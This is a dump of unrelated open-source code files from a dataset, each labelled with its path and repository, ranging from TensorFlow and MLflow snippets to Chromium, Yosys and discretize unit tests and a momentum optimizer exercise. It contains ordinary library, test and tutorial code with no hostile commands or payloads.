matrix1 = tf.constant([[3., 3.]])
# Create another Constant that produces a 2x1 matrix.
matrix2 = tf.constant([[2.],[2.]])
# Create a Matmul op that takes 'matrix1' and 'matrix2' as inputs.
# The returned value, 'product', represents the result of the matrix
# multiplication.
product = tf.matmul(matrix1, matrix2)
print("Multiplication with matrixes:", product)
# broadcast matrix in Multiplication
print("broadcast matrix in Multiplication:", matrix1 * matrix2)
###===================================== cast operations =====================================#
a = tf.convert_to_tensor(2.)
b = tf.cast(a, tf.int32)
print(a, b)
###===================================== shape operations ===================================#
a = tf.ones([2,3])
print(a.shape[0], a.shape[1]) # 2, 3
shape = tf.shape(a) # a tensor
print(shape[0], shape[1])
|
setup.py
|
epfml/collaborative-attention
| 125 |
116723
|
<filename>setup.py<gh_stars>100-1000
import setuptools
setuptools.setup(
name="collaborative-attention",
version="0.1.0",
author="<NAME>",
author_email="<EMAIL>",
description="",
url="https://github.com/collaborative-attention",
packages=["collaborative_attention"],
package_dir={"": "src/"},
python_requires=">=3.6",
install_requires=[
"tensorly>=0.4.5",
"transformers==2.11.0",
"parameterized>=0.7.4",
"tqdm>=4.46.0",
"wandb==0.9.2",
],
)
|
python/tests/artm/test_regularizer_topic_selection.py
|
MelLain/bigartm
| 638 |
116735
|
<reponame>MelLain/bigartm
# Copyright 2017, Additive Regularization of Topic Models.
import shutil
import glob
import tempfile
import os
import pytest
from six.moves import range
import artm
def test_func():
topic_selection_tau = 0.5
num_collection_passes = 3
num_document_passes = 10
num_topics = 15
data_path = os.environ.get('BIGARTM_UNITTEST_DATA')
batches_folder = tempfile.mkdtemp()
perplexity_eps = 0.1
perplexity_value = [6676.941798754971, 2534.963709464024, 2463.1544861984794]
try:
batch_vectorizer = artm.BatchVectorizer(data_path=data_path,
data_format='bow_uci',
collection_name='kos',
target_folder=batches_folder)
dictionary = artm.Dictionary(data_path=batches_folder)
model = artm.ARTM(num_topics=num_topics, dictionary=dictionary, num_document_passes=num_document_passes)
model.regularizers.add(artm.TopicSelectionThetaRegularizer(name='TopicSelection', tau=topic_selection_tau))
model.scores.add(artm.PerplexityScore(name='PerplexityScore'))
model.scores.add(artm.TopicMassPhiScore(name='TopicMass', model_name=model.model_nwt))
model.fit_offline(batch_vectorizer=batch_vectorizer, num_collection_passes=num_collection_passes)
# Verify that only 8 topics are non-zero (due to TopicSelection regularizer)
topics_left = sum(x == 0 for x in model.get_score('TopicMass').topic_mass)
assert 8 == topics_left
# the following asssertion fails on travis-ci builds, but passes locally
for i in range(num_collection_passes):
assert abs(model.score_tracker['PerplexityScore'].value[i] - perplexity_value[i]) < perplexity_eps
finally:
shutil.rmtree(batches_folder)
|
tools/grit/grit/format/chrome_messages_json_unittest.py
|
zealoussnow/chromium
| 14,668 |
116742
|
<gh_stars>1000+
#!/usr/bin/env python3
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittest for chrome_messages_json.py.
"""
from __future__ import print_function
import json
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import unittest
from six import StringIO
from grit import grd_reader
from grit import util
from grit.tool import build
class ChromeMessagesJsonFormatUnittest(unittest.TestCase):
# The default unittest diff limit is too low for our unittests.
# Allow the framework to show the full diff output all the time.
maxDiff = None
def testMessages(self):
root = util.ParseGrdForUnittest(u"""
<messages>
<message name="IDS_SIMPLE_MESSAGE">
Simple message.
</message>
<message name="IDS_QUOTES">
element\u2019s \u201c<ph name="NAME">%s<ex>name</ex></ph>\u201d attribute
</message>
<message name="IDS_PLACEHOLDERS">
<ph name="ERROR_COUNT">%1$d<ex>1</ex></ph> error, <ph name="WARNING_COUNT">%2$d<ex>1</ex></ph> warning
</message>
<message name="IDS_PLACEHOLDERS_SUBSTITUTED_BY_GETMESSAGE">
<ph name="BEGIN">$1<ex>a</ex></ph>test<ph name="END">$2<ex>b</ex></ph>
</message>
<message name="IDS_STARTS_WITH_SPACE">
''' (<ph name="COUNT">%d<ex>2</ex></ph>)
</message>
<message name="IDS_ENDS_WITH_SPACE">
(<ph name="COUNT">%d<ex>2</ex></ph>) '''
</message>
<message name="IDS_SPACE_AT_BOTH_ENDS">
''' (<ph name="COUNT">%d<ex>2</ex></ph>) '''
</message>
<message name="IDS_DOUBLE_QUOTES">
A "double quoted" message.
</message>
<message name="IDS_BACKSLASH">
\\
</message>
</messages>
""")
buf = StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('chrome_messages_json', 'en'),
buf)
output = buf.getvalue()
test = u"""
{
"SIMPLE_MESSAGE": {
"message": "Simple message."
},
"QUOTES": {
"message": "element\u2019s \u201c%s\u201d attribute"
},
"PLACEHOLDERS": {
"message": "%1$d error, %2$d warning"
},
"PLACEHOLDERS_SUBSTITUTED_BY_GETMESSAGE": {
"message": "$1$test$2$",
"placeholders": {
"1": {
"content": "$1"
},
"2": {
"content": "$2"
}
}
},
"STARTS_WITH_SPACE": {
"message": " (%d)"
},
"ENDS_WITH_SPACE": {
"message": "(%d) "
},
"SPACE_AT_BOTH_ENDS": {
"message": " (%d) "
},
"DOUBLE_QUOTES": {
"message": "A \\"double quoted\\" message."
},
"BACKSLASH": {
"message": "\\\\"
}
}
"""
self.assertEqual(json.loads(test), json.loads(output))
def testTranslations(self):
root = util.ParseGrdForUnittest("""
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>
Joi</ex></ph></message>
</messages>
""")
buf = StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('chrome_messages_json', 'fr'),
buf)
output = buf.getvalue()
test = u"""
{
"ID_HELLO": {
"message": "H\u00e9P\u00e9ll\u00f4P\u00f4!"
},
"ID_HELLO_USER": {
"message": "H\u00e9P\u00e9ll\u00f4P\u00f4 %s"
}
}
"""
self.assertEqual(json.loads(test), json.loads(output))
def testSkipMissingTranslations(self):
grd = """<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" current_release="3" source_lang_id="en"
base_dir="%s">
<outputs>
</outputs>
<release seq="3" allow_pseudo="False">
<messages fallback_to_english="true">
<message name="ID_HELLO_NO_TRANSLATION">Hello not translated</message>
</messages>
</release>
</grit>"""
root = grd_reader.Parse(StringIO(grd), dir=".")
buf = StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('chrome_messages_json', 'fr'),
buf)
output = buf.getvalue()
test = u'{}'
self.assertEqual(test, output)
def testVerifyMinification(self):
root = util.ParseGrdForUnittest(u"""
<messages>
<message name="IDS">
<ph name="BEGIN">$1<ex>a</ex></ph>test<ph name="END">$2<ex>b</ex></ph>
</message>
</messages>
""")
buf = StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('chrome_messages_json', 'en'),
buf)
output = buf.getvalue()
test = (u'{"IDS":{"message":"$1$test$2$","placeholders":'
u'{"1":{"content":"$1"},"2":{"content":"$2"}}}}')
self.assertEqual(test, output)
class DummyOutput(object):
def __init__(self, type, language):
self.type = type
self.language = language
def GetType(self):
return self.type
def GetLanguage(self):
return self.language
def GetOutputFilename(self):
return 'hello.gif'
if __name__ == '__main__':
unittest.main()
|
csa/examples/alpha_zero.py
|
CYHSM/chess-surprise-analysis
| 197 |
116808
|
"""
Run the analysis on all alpha zero games and save the resulting plot
"""
from csa import csa
# Load Game from PGN
for game_id in range(1, 11):
path_to_pgn = './games/alphazero/alphazero-vs-stockfish_game{}.pgn'.format(game_id)
chess_game = csa.load_game_from_pgn(path_to_pgn)
# Evaluate Game
depths = range(1, 35)
cp, nodes = csa.evaluate_game(chess_game, reset_engine=True,
halfmove_numbers=None, depths=depths,
verbose=1, async_callback=True)
# Save cp
csa.save_evaluation(cp, nodes, depths, True,
True, 'alphazero_stockfish_game{}'.format(game_id))
# Plot heatmap
csa.plot_cp(cp, fn='alphazero/alphazero_stockfish_game{}.svg'.format(game_id), save=True)
|
tests/resources/mlflow-test-plugin/mlflow_test_plugin/request_header_provider.py
|
PeterSulcs/mlflow
| 10,351 |
116869
|
from mlflow.tracking.request_header.abstract_request_header_provider import RequestHeaderProvider
class PluginRequestHeaderProvider(RequestHeaderProvider):
"""RequestHeaderProvider provided through plugin system"""
def in_context(self):
return False
def request_headers(self):
return {"test": "header"}
|
kombu/asynchronous/aws/sqs/ext.py
|
7Geese/kombu
| 5,079 |
116885
|
# -*- coding: utf-8 -*-
"""Amazon SQS boto3 interface."""
from __future__ import absolute_import, unicode_literals
try:
import boto3
except ImportError:
boto3 = None
|
ptop/statistics/__init__.py
|
deeps-nars/ptop
| 327 |
116894
|
from .statistics import Statistics
|
deal/introspection/__init__.py
|
orsinium/condition
| 311 |
116902
|
<gh_stars>100-1000
"""
The module provides `get_contracts` function which enumerates
contracts wrapping the given function. Every contract is returned
in wrapper providing a stable interface.
Usage example:
```python
import deal
@deal.pre(lambda x: x > 0)
def f(x):
return x + 1
contracts = deal.introspection.get_contracts(f)
for contract in contracts:
assert isinstance(contract, deal.introspection.Contract)
assert isinstance(contract, deal.introspection.Pre)
assert contract.source == 'x > 0'
assert contract.exception is deal.PreContractError
contract.validate(1)
```
"""
from ._extractor import get_contracts, init_all, unwrap
from ._wrappers import (
Contract, Ensure, Example, Has, Post, Pre, Raises, Reason, ValidatedContract,
)
__all__ = [
# functions
'get_contracts',
'init_all',
'unwrap',
# wrappers
'Contract',
'Ensure',
'Example',
'Has',
'Post',
'Pre',
'Raises',
'Reason',
'ValidatedContract',
]
|
setup.py
|
yespon/Chinese-Annotator
| 915 |
116913
|
from setuptools import setup, find_packages
setup(name='chi_annotator', version='1.0', packages=find_packages())
|
third_party/tests/YosysTests/architecture/synth_xilinx_srl/generate.py
|
parzival3/Surelog
| 156 |
116915
|
<gh_stars>100-1000
#!/usr/bin/python3
import re, glob
N = 131
def assert_static_area(fp, i, name):
if i < 3:
srl32,srl16,fd = (0,0,i)
else:
srl32 = i // 32
if (i % 32) == 0:
srl16 = 0
fd = 0
elif (i % 32) == 1:
srl16 = 0
fd = 1
elif (i % 32) <= 17:
srl16 = 1
fd = (i % 32) - 16
else:
srl32 += 1
srl16 = 0
fd = 0
fp.write('''
`ifndef _AUTOTB
module __test ;
wire [4095:0] assert_area = "cd; select t:FD* -assert-count {0}; select t:SRL16E -assert-count {1}; select t:SRLC32E -assert-count {2}; cd {3}_{4}; select t:BUFG t:FD* t:SRL16E t:SRLC32E %% %n t:* %i -assert-none";
endmodule
`endif
'''.format(fd, srl16, srl32, name, i))
def assert_dynamic_area(fp, i, name):
if i < 3:
srl32,srl16,fd = (0,0,i)
lut3 = 1 if i > 1 else 0
lut5 = 0
else:
srl32 = i // 32
if (i % 128) == 0 or (i % 32) == 0:
srl16 = 0
fd = 0
elif (i % 128) == 1:
srl16 = 0
fd = 1
elif (i % 32) <= 16:
srl16 = 1
fd = 0
else:
srl32 += 1
srl16 = 0
fd = 0
lut3 = 1 if i > 128 and i < 257 else 0
lut5 = 1 if i > 256 else 0
muxf8 = (srl32+srl16) // 4
if ((srl32 + srl16) % 4) == 0:
muxf7 = muxf8 * 2
elif ((srl32 + srl16) % 4) == 3:
muxf8 += 1
muxf7 = muxf8 * 2
else:
muxf7 = (srl32+srl16) // 2
fp.write('''
`ifndef _AUTOTB
module __test ;
wire [4095:0] assert_area = "cd; select t:FD* -assert-count {0}; select t:SRL16E -assert-count {1}; select t:SRLC32E -assert-count {2}; select t:MUXF7 -assert-count {3}; select t:MUXF8 -assert-count {4}; select t:LUT3 -assert-count {5}; select t:LUT5 -assert-count {6}; cd {7}_{8}; select t:BUFG t:FD* t:SRL16E t:SRLC32E t:MUXF7 t:MUXF8 t:LUT3 t:LUT5 %% %n t:* %i -assert-none";
endmodule
`endif
'''.format(fd, srl16, srl32, muxf7, muxf8, lut3, lut5, name, i))
# Test 1: pos_clk_no_enable_no_init_not_inferred
for i in range(1,N+1):
with open('pos_clk_no_enable_no_init_not_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module pos_clk_no_enable_no_init_not_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, output [width-1:0] q);
generate
wire [depth:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
assign int[w][0] = i[w];
for (d = 0; d < depth; d=d+1) begin
\$_DFFE_PP_ r(.C(clk), .D(int[w][d]), .E(1'b1), .Q(int[w][d+1]));
end
assign q[w] = int[w][depth];
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'pos_clk_no_enable_no_init_not_inferred')
# Test 2: pos_clk_with_enable_no_init_not_inferred
for i in range(1,N+1):
with open('pos_clk_with_enable_no_init_not_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module pos_clk_with_enable_no_init_not_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, output [width-1:0] q);
generate
wire [depth:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
assign int[w][0] = i[w];
for (d = 0; d < depth; d=d+1) begin
\$_DFFE_PP_ r(.C(clk), .D(int[w][d]), .E(e), .Q(int[w][d+1]));
end
assign q[w] = int[w][depth];
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'pos_clk_with_enable_no_init_not_inferred')
# Test 3: pos_clk_with_enable_with_init_inferred
for i in range(1,N+1):
with open('pos_clk_with_enable_with_init_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module pos_clk_with_enable_with_init_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, output [width-1:0] q);
generate
reg [depth-1:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
for (d = 0; d < depth; d=d+1)
initial int[w][d] <= ~((d+w) % 2);
if (depth == 1) begin
always @(posedge clk) if (e) int[w] <= i[w];
assign q[w] = int[w];
end
else begin
always @(posedge clk) if (e) int[w] <= {{ int[w][depth-2:0], i[w] }};
assign q[w] = int[w][depth-1];
end
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'pos_clk_with_enable_with_init_inferred')
# Test 4: neg_clk_no_enable_no_init_not_inferred
for i in range(1,N+1):
with open('neg_clk_no_enable_no_init_not_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module neg_clk_no_enable_no_init_not_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, output [width-1:0] q);
generate
wire [depth:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
assign int[w][0] = i[w];
for (d = 0; d < depth; d=d+1) begin
\$_DFFE_NP_ r(.C(clk), .D(int[w][d]), .E(1'b1), .Q(int[w][d+1]));
end
assign q[w] = int[w][depth];
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'neg_clk_no_enable_no_init_not_inferred')
# Test 5: neg_clk_no_enable_no_init_inferred
for i in range(1,N+1):
with open('neg_clk_no_enable_no_init_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module neg_clk_no_enable_no_init_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, output [width-1:0] q);
generate
reg [depth-1:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
if (depth == 1) begin
always @(negedge clk) int[w] <= i[w];
assign q[w] = int[w];
end
else begin
always @(negedge clk) int[w] <= {{ int[w][depth-2:0], i[w] }};
assign q[w] = int[w][depth-1];
end
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'neg_clk_no_enable_no_init_inferred')
# Test 6: neg_clk_with_enable_with_init_inferred
for i in range(1,N+1):
with open('neg_clk_with_enable_with_init_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module neg_clk_with_enable_with_init_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, output [width-1:0] q);
generate
reg [depth-1:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
for (d = 0; d < depth; d=d+1)
initial int[w][d] <= ~((d+w) % 2);
if (depth == 1) begin
always @(negedge clk) if (e) int[w] <= i[w];
assign q[w] = int[w];
end
else begin
always @(negedge clk) if (e) int[w] <= {{ int[w][depth-2:0], i[w] }};
assign q[w] = int[w][depth-1];
end
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'neg_clk_with_enable_with_init_inferred')
# Test 10: pos_clk_no_enable_no_init_not_inferred_var_len
for i in range(1,N+1):
with open('pos_clk_no_enable_no_init_not_inferred_var_len_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module pos_clk_no_enable_no_init_not_inferred_var_len_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input [31:0] l, output [width-1:0] q);
generate
wire [depth:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
assign int[w][0] = i[w];
for (d = 0; d < depth; d=d+1) begin
\$_DFFE_PP_ r(.C(clk), .D(int[w][d]), .E(1'b1), .Q(int[w][d+1]));
end
wire [depth-1:0] t;
assign t = int[w][depth:1];
assign q[w] = t[l];
end
endgenerate
endmodule
'''.format(i))
assert_dynamic_area(fp, i, 'pos_clk_no_enable_no_init_not_inferred_var_len')
# Test 11: neg_clk_with_enable_with_init_inferred_var_len
for i in range(1,N+1):
with open('neg_clk_with_enable_with_init_inferred_var_len_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module neg_clk_with_enable_with_init_inferred_var_len_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, input [31:0] l, output [width-1:0] q);
generate
reg [depth-1:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
for (d = 0; d < depth; d=d+1)
initial int[w][d] <= ~((d+w) % 2);
if (depth == 1) begin
always @(negedge clk) if (e) int[w] <= i[w];
assign q[w] = int[w];
end
else begin
always @(negedge clk) if (e) int[w] <= {{ int[w][depth-2:0], i[w] }};
assign q[w] = int[w][l];
end
end
endgenerate
endmodule
'''.format(i))
assert_dynamic_area(fp, i, 'neg_clk_with_enable_with_init_inferred_var_len')
import lfsr_area
re_lfsr = re.compile(r'lfsr_(\d+)\.v')
for fn in glob.glob('lfsr_*.v'):
m = re_lfsr.match(fn)
if not m: continue
W = int(m.group(1))
with open(fn, 'a') as f:
print('''
`ifndef _AUTOTB
module __test ;
wire [4095:0] assert_area = "%s";
endmodule
`endif
''' % lfsr_area.area[W], file=f)
# Test 15: pos_clk_no_enable_no_init_not_inferred
for i in range(128+1,128+N+1):
with open('pos_clk_no_enable_no_init_not_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module pos_clk_no_enable_no_init_not_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, output [width-1:0] q);
generate
wire [depth:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
assign int[w][0] = i[w];
for (d = 0; d < depth; d=d+1) begin
\$_DFFE_PP_ r(.C(clk), .D(int[w][d]), .E(1'b1), .Q(int[w][d+1]));
end
assign q[w] = int[w][depth];
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'pos_clk_no_enable_no_init_not_inferred')
# Test 16: neg_clk_with_enable_with_init_inferred_var_len
for i in range(128+1,128+N+1):
with open('neg_clk_with_enable_with_init_inferred_var_len_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module neg_clk_with_enable_with_init_inferred_var_len_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, input [31:0] l, output [width-1:0] q);
generate
reg [depth-1:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
for (d = 0; d < depth; d=d+1)
initial int[w][d] <= ~((d+w) % 2);
if (depth == 1) begin
always @(negedge clk) if (e) int[w] <= i[w];
assign q[w] = int[w];
end
else begin
always @(negedge clk) if (e) int[w] <= {{ int[w][depth-2:0], i[w] }};
assign q[w] = int[w][l];
end
end
endgenerate
endmodule
'''.format(i))
assert_dynamic_area(fp, i, 'neg_clk_with_enable_with_init_inferred_var_len')
# Test 18: neg_clk_with_enable_with_init_inferred2
for i in range(1,N+1):
with open('neg_clk_with_enable_with_init_inferred2_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module neg_clk_with_enable_with_init_inferred2_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, output [width-1:0] q);
generate
reg [width-1:0] int [depth-1:0];
genvar w, d;
for (d = 0; d < depth; d=d+1) begin
for (w = 0; w < width; w=w+1) begin
//initial int[d][w] <= ~((d+w) % 2);
if (d == 0) begin
always @(negedge clk) if (e) int[d][w] <= i[w];
end
else begin
always @(negedge clk) if (e) int[d][w] <= int[d-1][w];
end
end
end
assign q = int[depth-1];
endgenerate
endmodule'''.format(i))
assert_static_area(fp, i, 'neg_clk_with_enable_with_init_inferred2')
# Test 19: pos_clk_with_enable_no_init_inferred2_var_len
for i in range(1,N+1):
with open('pos_clk_with_enable_no_init_inferred2_var_len_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module pos_clk_with_enable_no_init_inferred2_var_len_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, input [31:0] l, output [width-1:0] q);
generate
reg [width-1:0] int [depth-1:0];
genvar w, d;
for (d = 0; d < depth; d=d+1) begin
for (w = 0; w < width; w=w+1) begin
initial int[d][w] <= ~((d+w) % 2);
if (d == 0) begin
always @(posedge clk) if (e) int[d][w] <= i[w];
end
else begin
always @(posedge clk) if (e) int[d][w] <= int[d-1][w];
end
end
end
assign q = int[l];
endgenerate
endmodule'''.format(i))
assert_dynamic_area(fp, i, 'pos_clk_with_enable_no_init_inferred2_var_len')
|
tests/boundaries/test_boundary_integrals.py
|
ngodber/discretize
| 123 |
116918
|
<gh_stars>100-1000
import numpy as np
import scipy.sparse as sp
import discretize
def u(*args):
if len(args) == 1:
x = args[0]
return x**3
if len(args) == 2:
x, y = args
return x**3 + y**2
x, y, z = args
return x**3 + y**2 + z**4
def v(*args):
if len(args) == 1:
x = args[0]
return 2*x**2
if len(args) == 2:
x, y = args
return np.c_[2*x**2, 3*y**3]
x, y, z = args
return np.c_[2*x**2, 3*y**3, -4*z**2]
def w(*args):
if len(args) == 2:
x, y = args
return np.c_[(y - 2)**2, (x + 2)**2]
x, y, z = args
return np.c_[(y-2)**2 + z**2, (x+2)**2 - (z-4)**2, y**2-x**2]
# mesh will be on [0, 1] square
# 1D
# int_V grad_u dot v dV = 6/5
# int_V u dot div v dV = 4/5
# 2D
# square vals:
# int_V grad_u dot v dV = 12/5
# int_V u div_v dV = 241/60
# int_v curl_w dot v dV = -173/30
# circle vals:
# int_V grad_u dot dV = 3*np.pi/2
# int_V u div_v dV = 13*np.pi/8
# int_v curl_w dot v dV = -43*np.pi/8
# 3D square vals:
# int_V grad_u dot v dV = -4/15
# int_V u div_v dV = 27/20
# int_v curl_w dot v dV = 17/6
class Test1DBoundaryIntegral(discretize.tests.OrderTest):
name = "1D Boundary Integrals"
meshTypes = ["uniformTensorMesh"]
meshDimension = 1
expectedOrders = 2
meshSizes = [4, 8, 16, 32, 64, 128]
def getError(self):
mesh = self.M
if self.myTest == "cell_grad":
u_cc = u(mesh.cell_centers)
v_f = v(mesh.nodes)
u_bf = u(mesh.boundary_faces)
D = mesh.face_divergence
M_c = sp.diags(mesh.cell_volumes)
M_bf = mesh.boundary_face_scalar_integral
discrete_val = -(v_f.T @ D.T) @ M_c @ u_cc + v_f.T @ (M_bf @ u_bf)
true_val = 6/5
if self.myTest == "edge_div":
u_n = u(mesh.nodes)
v_e = v(mesh.edges)
v_bn = v(mesh.boundary_nodes).reshape(-1, order='F')
M_e = mesh.get_edge_inner_product()
G = mesh.nodal_gradient
M_bn = mesh.boundary_node_vector_integral
discrete_val = -(u_n.T @ G.T) @ M_e @ v_e + u_n.T @ (M_bn @ v_bn)
true_val = 4/5
return np.abs(discrete_val - true_val)
def test_orderWeakCellGradIntegral(self):
self.name = "1D - weak cell gradient integral w/boundary"
self.myTest = "cell_grad"
self.orderTest()
def test_orderWeakEdgeDivIntegral(self):
self.name = "1D - weak edge divergence integral w/boundary"
self.myTest = "edge_div"
self.orderTest()
class Test2DBoundaryIntegral(discretize.tests.OrderTest):
name = "2D Boundary Integrals"
meshTypes = [
"uniformTensorMesh",
"uniformTree",
"uniformCurv",
"rotateCurv",
"sphereCurv"
]
meshDimension = 2
expectedOrders = [2, 2, 2, 2, 1]
meshSizes = [4, 8, 16, 32, 64, 128]
def getError(self):
mesh = self.M
if self.myTest == "cell_grad":
# Functions:
u_cc = u(*mesh.cell_centers.T)
v_f = mesh.project_face_vector(v(*mesh.faces.T))
u_bf = u(*mesh.boundary_faces.T)
D = mesh.face_divergence
M_c = sp.diags(mesh.cell_volumes)
M_bf = mesh.boundary_face_scalar_integral
discrete_val = -(v_f.T @ D.T) @ M_c @ u_cc + v_f.T @ (M_bf @ u_bf)
if "sphere" not in self._meshType:
true_val = 12/5
else:
true_val = 3*np.pi/2
elif self.myTest == "edge_div":
u_n = u(*mesh.nodes.T)
v_e = mesh.project_edge_vector(v(*mesh.edges.T))
v_bn = v(*mesh.boundary_nodes.T).reshape(-1, order='F')
M_e = mesh.get_edge_inner_product()
G = mesh.nodal_gradient
M_bn = mesh.boundary_node_vector_integral
discrete_val = -(u_n.T @ G.T) @ M_e @ v_e + u_n.T @ (M_bn @ v_bn)
if "sphere" not in self._meshType:
true_val = 241/60
else:
true_val = 13*np.pi/8
elif self.myTest == "face_curl":
w_e = mesh.project_edge_vector(w(*mesh.edges.T))
u_c = u(*mesh.cell_centers.T)
u_be = u(*mesh.boundary_edges.T)
M_c = sp.diags(mesh.cell_volumes)
Curl = mesh.edge_curl
M_be = mesh.boundary_edge_vector_integral
discrete_val = (w_e.T @ Curl.T) @ M_c @ u_c - w_e.T @ (M_be @ u_be)
if 'Curv' in self._meshType:
self._expectedOrder = -1.0
if "sphere" not in self._meshType:
true_val = -173/30
else:
true_val = -43*np.pi/8
return np.abs(discrete_val - true_val)
def test_orderWeakCellGradIntegral(self):
self.name = "2D - weak cell gradient integral w/boundary"
self.myTest = "cell_grad"
self.orderTest()
def test_orderWeakEdgeDivIntegral(self):
self.name = "2D - weak edge divergence integral w/boundary"
self.myTest = "edge_div"
self.orderTest()
def test_orderWeakFaceCurlIntegral(self):
self.name = "2D - weak face curl integral w/boundary"
self.myTest = "face_curl"
self.orderTest()
class Test3DBoundaryIntegral(discretize.tests.OrderTest):
name = "3D Boundary Integrals"
meshTypes = [
"uniformTensorMesh",
"randomTensorMesh",
"uniformTree",
"uniformCurv",
"rotateCurv",
"sphereCurv"
]
meshDimension = 3
expectedOrders = [2, 1, 2, 2, 2, 0]
meshSizes = [4, 8, 16, 32]
def getError(self):
mesh = self.M
if self.myTest == "cell_grad":
# Functions:
u_cc = u(*mesh.cell_centers.T)
v_f = mesh.project_face_vector(v(*mesh.faces.T))
u_bf = u(*mesh.boundary_faces.T)
D = mesh.face_divergence
M_c = sp.diags(mesh.cell_volumes)
M_bf = mesh.boundary_face_scalar_integral
discrete_val = -(v_f.T @ D.T) @ M_c @ u_cc + v_f.T @ (M_bf @ u_bf)
if "sphere" not in self._meshType:
true_val = -4/15
else:
true_val = 48*np.pi/35
elif self.myTest == "edge_div":
u_n = u(*mesh.nodes.T)
v_e = mesh.project_edge_vector(v(*mesh.edges.T))
v_bn = v(*mesh.boundary_nodes.T).reshape(-1, order='F')
M_e = mesh.get_edge_inner_product()
G = mesh.nodal_gradient
M_bn = mesh.boundary_node_vector_integral
discrete_val = -(u_n.T @ G.T) @ M_e @ v_e + u_n.T @ (M_bn @ v_bn)
if "sphere" not in self._meshType:
true_val = 27/20
else:
true_val = 8*np.pi/5
elif self.myTest == "face_curl":
w_f = mesh.project_face_vector(w(*mesh.faces.T))
v_e = mesh.project_edge_vector(v(*mesh.edges.T))
w_be = w(*mesh.boundary_edges.T).reshape(-1, order='F')
M_f = mesh.get_face_inner_product()
Curl = mesh.edge_curl
M_be = mesh.boundary_edge_vector_integral
discrete_val = (v_e.T @ Curl.T) @ M_f @ w_f - v_e.T @ (M_be @ w_be)
if "sphere" not in self._meshType:
true_val = -79/6
else:
true_val = -64*np.pi/5
return np.abs(discrete_val - true_val)
def test_orderWeakCellGradIntegral(self):
self.name = "3D - weak cell gradient integral w/boundary"
self.myTest = "cell_grad"
self.orderTest()
def test_orderWeakEdgeDivIntegral(self):
self.name = "3D - weak edge divergence integral w/boundary"
self.myTest = "edge_div"
self.orderTest()
def test_orderWeakFaceCurlIntegral(self):
self.name = "3D - weak face curl integral w/boundary"
self.myTest = "face_curl"
self.orderTest()
|
labs/08_frameworks/solutions/momentum_optimizer.py
|
soufiomario/labs-Deep-learning
| 1,398 |
116986
|
class MomentumGradientDescent(GradientDescent):
def __init__(self, params, lr=0.1, momentum=.9):
super(MomentumGradientDescent, self).__init__(params, lr)
self.momentum = momentum
self.velocities = [torch.zeros_like(param, requires_grad=False)
for param in params]
def step(self):
with torch.no_grad():
for i, (param, velocity) in enumerate(zip(self.params,
self.velocities)):
velocity = self.momentum * velocity + param.grad
param -= self.lr * velocity
self.velocities[i] = velocity
|
vimfiles/bundle/vim-python/submodules/pylint/tests/functional/t/too/too_many_arguments_overload.py
|
ciskoinch8/vimrc
| 463 |
117003
|
<reponame>ciskoinch8/vimrc
# pylint: disable=missing-function-docstring,missing-module-docstring,missing-class-docstring
# pylint: disable=too-few-public-methods
from typing import overload
class ClassA:
@classmethod
@overload
def method(cls, arg1):
pass
@classmethod
@overload
def method(cls, arg1, arg2):
pass
@classmethod
def method(cls, arg1, arg2=None):
pass
ClassA.method(1, 2)
class ClassB:
@overload
def method(self, arg1):
pass
@overload
def method(self, arg1, arg2):
pass
def method(self, arg1, arg2=None):
